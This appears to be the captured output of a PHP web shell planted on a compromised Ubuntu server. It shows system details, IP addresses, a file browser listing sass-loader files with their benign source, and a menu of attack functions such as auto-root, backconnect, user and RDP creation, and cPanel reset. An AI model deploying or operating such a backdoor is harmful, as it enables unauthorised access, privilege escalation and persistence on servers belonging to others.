Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
amatya /
quiz1 /
node_modules /
sass-loader /
dist /
[ HOME SHELL ]
Name
Size
Permission
Action
SassError.js
1.1
KB
-rw-rw-rw-
SassWarning.js
456
B
-rw-rw-rw-
cjs.js
83
B
-rw-rw-rw-
index.js
3.41
KB
-rw-rw-rw-
options.json
1.91
KB
-rw-rw-rw-
utils.js
23.7
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : SassError.js
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); exports.default = void 0; class SassError extends Error { constructor(sassError) { super(); this.name = "SassError"; // TODO remove me in the next major release this.originalSassError = sassError; if (typeof sassError.line !== "undefined" || typeof sassError.column !== "undefined") { this.loc = { line: sassError.line, column: sassError.column }; } // Keep original error if `sassError.formatted` is unavailable this.message = `${this.name}: ${typeof this.originalSassError.message !== "undefined" ? this.originalSassError.message : this.originalSassError}`; if (this.originalSassError.formatted) { this.message = `${this.name}: ${this.originalSassError.formatted.replace(/^Error: /, "")}`; // Instruct webpack to hide the JS stack from the console. // Usually you're only interested in the SASS stack in this case. this.hideStack = true; Error.captureStackTrace(this, this.constructor); } } } var _default = SassError; exports.default = _default;
Close